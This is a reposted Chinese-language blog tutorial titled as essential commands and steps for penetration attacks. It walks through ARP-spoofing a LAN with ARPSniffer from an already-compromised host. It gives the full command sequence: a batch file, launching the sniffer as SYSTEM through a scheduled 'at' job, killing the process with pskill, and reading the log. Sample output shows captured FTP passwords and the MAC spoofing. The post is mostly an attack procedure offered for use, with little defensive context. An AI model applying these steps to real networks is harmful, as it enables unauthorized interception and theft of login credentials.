典型攻擊之滲透攻擊必用命令與步驟(轉)

RegisterForBlog發表於2007-09-19
典型攻擊之滲透攻擊必用命令與步驟(轉)[@more@]

  假設想攻擊的主機IP是:61.139.1.79

  同一子網下我們已有許可權的主機IP是:61.139.1.88並可以3389登陸

  第一步:

  tracert 61.139.1.1

  C:WIN2000system32>tracert 61.139.1.1

  Tracing route to HACK-4FJ7EARC [61.139.1.1]

  over a maximum of 30 hops:

  1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]

  Trace complete.

  這就說明了你想攻擊的主機和你所在的主機在一個關網中那麼就有可能

  進行ARPSNIFFER了

  第二步:看本機IP設定和網路卡情況

  C:WIN2000system32>ipconfig /all

  Windows 2000 IP Configuration

  Host Name . . . . . . . . . . . . : smscomputer

  Primary DNS Suffix . . . . . . . :

  Node Type . . . . . . . . . . . . : Broadcast

  IP Routing Enabled. . . . . . . . : No

  WINS Proxy Enabled. . . . . . . . : No

  Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:

  Connection-specific DNS Suffix . :

  Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection

  Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6

  DHCP Enabled. . . . . . . . . . . : No

  IP Address. . . . . . . . . . . . : 61.139.1.2

  Subnet Mask . . . . . . . . . . . : 255.255.255.0

  Default Gateway . . . . . . . . . : 61.139.1.65

  DNS Servers . . . . . . . . . . . : 61.139.1.73

  說明只有一塊網路卡那麼在執行ARPSNIFFER的時候就可以不要第五個引數了這個地

  方小榕的主頁可沒有說喲,經過測試我發覺如果只有一塊網路卡你第五個引數使用0

  的話也只能嗅探到透過自已的資料喲.

  從上面我們還可以知道閘道器是61.139.1.65

  第三步:檢視本機時間

  C:WIN2000system32>net time 127.0.0.1

  127.0.0.1 的當前時間是 2003/1/28 下午 09:13

  命令完成成功

  要注意的是這兒的時間是12小時式,用at命令應要24小時式

  第四步:編寫啟動ARPsniffer的bat檔案

  C:WIN2000system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:winnta.bat

  注意咯我們沒有要第五個引數,如果有多個網路卡的話你就要先直接執行arpsniffer顯示如下:

  ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB

   2002, security@vip.sina.com

  Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter

  Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(這個地方選第五個引數)

  Usage: ArpSniffer [/RESET]

  第五步:後臺執行開始嗅探咯

  C:winntsystem32>at 127.0.0.1 20:44 c:winnta.bat

  注意:這兒的時間要用24小時式

  arpsniffer最好拷到system32目錄下,記錄檔案也會生成在這兒

  執行完第四步要先安裝WINPCAP 2.1驅動

  同時arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改登錄檔重啟機子

  第六步:看密碼但是生成的記錄檔案不能直接看也不能複製所以我們只能先結束掉

  以SYSTEM許可權啟動的ARPSniffer程式

  C:winntsystem32>pulist

  ...................

  conime.exe 248 NT AUTHORITYSYSTEM

  explorer.exe 1864 SMSCOMPUTERAdministrator

  CSRSS.EXE 2256 NT AUTHORITYSYSTEM

  Arpsniffer.exe 2322 NT AUTHORITYSYSTEM ----就是它了!

  WINLOGON.EXE 2344 NT AUTHORITYSYSTEM

  ......................

  殺了它

  C:winntsystem32>pskill 2322

  PsKill v1.03 - local and remote process killer

  Copyright (C) 2000 Mark Russinovich

  

  Process 2322 killed.

  C:winntsystem32>type 1.txt 我的例子中嗅探的是FTP密碼:)

  ...............

  61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb

  61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

  61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

  61.188.218.179(1404)->61.139.1.79(21)QUIT

  61.188.218.179(1404)->61.139.1.79(21)QUIT

  61.139.1.79(21)->61.188.218.179(1404)221

  61.139.1.79(21)->61.188.218.179(1404)221

  ............

  ............

  特別要注意的就是PASS哈:)

  ----------------------------------------------------

  付錄:

  前臺正常執行的顯示

  C:>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset

  ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB

   2002, security@vip.sina.com

  Network Adapter 0: Intel(R) 8255x Based Network Connection

  Enable IP Router....OK

  Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02

  Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb

  Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6

  Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88

  Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88

  有時這兒要先顯示can not open driver(0)不管它等一下就可以了

  Begin Sniffer.........

  

·上一篇:

·下一篇:
 
     最新更新
·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·

·


| | | | | | |

Copyright © 2004 - 2007 All Rights Reserved

來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10763080/viewspace-970158/,如需轉載,請註明出處,否則將追究法律責任。

典型攻擊之滲透攻擊必用命令與步驟(轉)
請登入後發表評論 登入
全部評論

相關文章